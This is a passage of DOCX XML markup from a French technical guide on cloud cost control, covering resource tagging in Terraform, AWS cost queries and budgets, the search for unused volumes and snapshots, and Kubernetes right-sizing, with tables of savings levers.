              </w:rPr>
              <w:t>Observabilité</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Volume de journaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rétention, échantillonnage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COÛT UNITAIRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dépense rapportée à une unité de valeur : par commande, par utilisateur actif, par requête. C'est le seul indicateur qui relie la dépense à l'activité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="104" name="Picture 104"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f102.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.102 — De la facture à la décision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>88.2 Rendre la dépense visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sans étiquetage, la facture reste un total opaque. Trois étiquettes suffisent à couvrir l'essentiel : l'application, l'environnement et le propriétaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un étiquetage systématique · hcl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Étiquettes obligatoires, appliquées par politique</w:t>
        <w:br/>
        <w:t># (Terraform)</w:t>
        <w:br/>
        <w:t>locals {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  etiquettes = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    application   = "boutique"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environnement = var.environnement</w:t>
        <w:br/>
        <w:t xml:space="preserve">    proprietaire  = "equipe-boutique"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cout_centre   = "cc-421"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>resource "aws_instance" "app" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  # ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tags = merge(local.etiquettes, { role = "applicatif" })</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t># Détecter les ressources non étiquetées</w:t>
        <w:br/>
        <w:t>aws resourcegroupstaggingapi get-resources \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --tag-filters Key=environnement \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query 'ResourceTagMappingList[].ResourceARN'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.345 — Quatre étiquettes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0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Étiquette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Valeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>application</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Nom du produit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vue par produit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>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dev, recette, production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Séparer l'essentiel du reste</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>proprietaire</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Équipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Responsabilisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>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cout_centre</w:t>
            </w:r>
          </w:p>
        </w:tc>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Code comptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Refacturation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux contrôles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Anomalie de coût : détection par seuil relatif</w:t>
        <w:br/>
        <w:t>aws ce get-cost-and-usage \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --time-period Start=2026-10-01,End=2026-10-19 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --granularity DAILY --metrics UnblendedCost \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --group-by Type=DIMENSION,Key=SERVICE</w:t>
        <w:br/>
        <w:br/>
        <w:t># Budget avec alerte à 80 % et 100 %</w:t>
        <w:br/>
        <w:t>aws budgets create-budget --account-id 123456789012 \</w:t>
        <w:br/>
        <w:t>--budget file://budget.json --notifications-with-subscribers</w:t>
        <w:br/>
        <w:t xml:space="preserve">    file://alertes.json</w:t>
      </w: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UNE ANOMALIE SE JUGE EN RELATIF</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une facture qui double en un jour est suspecte ; une facture qui augmente de 5 % avec 20 % de trafic en plus est saine. Comparez toujours la dépense à l'usage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>88.3 Économiser sans casser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les économies faciles se trouvent dans les ressources oubliées, puis dans le dimensionnement. Les engagements viennent en dernier, quand l'usage est stable et connu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.346 — Six leviers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Levier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Gain typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suppression des ressources orphelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5 à 15 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Arrêt hors production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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10 à 30 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dimensionnement ajusté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10 à 25 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Réservation / engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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20 à 40 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Blocage sur 1 à 3 ans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cycle de vie du stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5 à 20 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Réduction des journaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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5 à 15 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Perte de diagnostic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois recherches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Chercher les volumes non attachés</w:t>
        <w:br/>
        <w:t>aws ec2 describe-volumes --filters Name=status,Values=available \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query 'Volumes[].{id:VolumeId,taille:Size,cree:CreationTime}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chercher les adresses IP réservées non utilisées</w:t>
        <w:br/>
        <w:t>aws ec2 describe-addresses --query 'Addresses[?AssociationId==null]'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chercher les instantanés de plus de 90 jours</w:t>
        <w:br/>
        <w:t>aws ec2 describe-snapshots --owner-ids self \</w:t>
        <w:br/>
        <w:t>--query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'Snapshots[?StartTime&lt;=`2026-07-01`].[SnapshotId,StartTime,VolumeSize]'</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ATTENTION AUX ÉCONOMIES QUI DÉPLACENT LE COÛT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Éteindre une base la nuit réduit la facture de calcul mais peut allonger le démarrage et provoquer des incidents. Une économie qui dégrade la fiabilité n'est pas une économie : c'est un transfert vers l'astreinte.</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ENGAGEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Achat à l'avance d'une capacité pour une durée donnée, en échange d'une remise. Il réduit le coût à condition que l'usage reste supérieur à l'engagement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>88.4 Dimensionner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le surdimensionnement est la norme par prudence. Le sous-dimensionnement coûte en incident. La bonne méthode consiste à mesurer, puis à viser une marge explicite plutôt qu'un facteur arbitraire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un constat chiffré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Utilisation réelle sur 30 jours</w:t>
        <w:br/>
        <w:t>kubectl top pods -n production --sort-by=cpu</w:t>
        <w:br/>
        <w:t>kubectl top nodes</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparer la demande et la consommation</w:t>
        <w:br/>
        <w:t>kubectl describe node | grep -A6 "Allocated resources"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Exemple de constat : requests cpu = 2, usage p95 = 0,35</w:t>
        <w:br/>
        <w:t># → requests excessifs : le cluster réserve 6 fois le besoin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.347 — Quatre constats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9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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Constat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Usage p95 &lt;&lt; requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réservation excessive</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Ajuster les requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Usage proche des limites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Risque d'éviction</w:t>
            </w:r>
          </w:p>
        </w:tc>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Augmenter ou optimiser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pics prévisibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dimensionner pour la pointe</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Autoscaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
